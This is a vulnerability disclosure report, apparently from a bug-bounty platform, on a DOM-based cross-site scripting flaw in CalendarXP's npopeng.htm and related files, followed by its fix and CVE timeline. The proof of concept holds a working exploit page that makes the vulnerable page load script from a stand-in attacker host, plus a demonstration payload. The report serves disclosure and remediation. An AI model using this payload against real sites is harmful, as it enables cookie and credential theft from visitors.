DOM-based Cross-site Scripting (DXSS) Vulnerability in victorwon/calendarxp

Valid

Reported on

Nov 22nd 2022

Description

Two CalendarXP products have DXSS vulnerability in common parts of HTML files. CalendarXP FlatCalendarXP through 10.0.1 has DXSS vulnerability in iflateng.htm and nflateng.htm, and CalendarXP PopCalendarXP through 10.0.1 has DXSS vulnerability in ipopeng.htm and npopeng.htm.

Proof of Concept

Create a .html file (https://attacker-domain.com/exploit.html) with the code below and upload it to your server

<!-- exploit.html -->
<script>
    window.name = "gToday://attacker-domain.com/payload:agenda.js";
    location.href = "https://VULNERABLE-DOMAIN.COM/path/to/file/npopeng.htm";
</script>

Create a .js file (https://attacker-domain.com/payload.js) with the code below and upload it to your server

// payload.js
alert("XSS-Checker")

Send the link of the uploaded .html file (https://attacker-domain.com/exploit.html) to the victim. Whenever victim clicks this link, malicious javascript code will be executed

Impact

An attacker can easily take advantage of this vulnerability to steal usernames and passwords, session cookies, inject malicious javascript code into websites, etc.

We are processing your report and will contact the victorwon/calendarxp team within 24 hours. 2 months ago
We created a GitHub Issue asking the maintainers to create a SECURITY.md 2 months ago
We have contacted a member of the victorwon/calendarxp team and are waiting to hear back a month ago
victorwon validated this vulnerability a month ago
Truoc Phan has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
victorwon marked this as fixed in 10.0.2 with commit e3715b a month ago
The fix bounty has been dropped
This vulnerability will not receive a CVE
victorwon published this vulnerability a month ago
npopeng.htm#L101 has been validated
Truoc Phan
17 days ago

Researcher

This vulnerability is assigned CVE-2022-4522

to join this conversation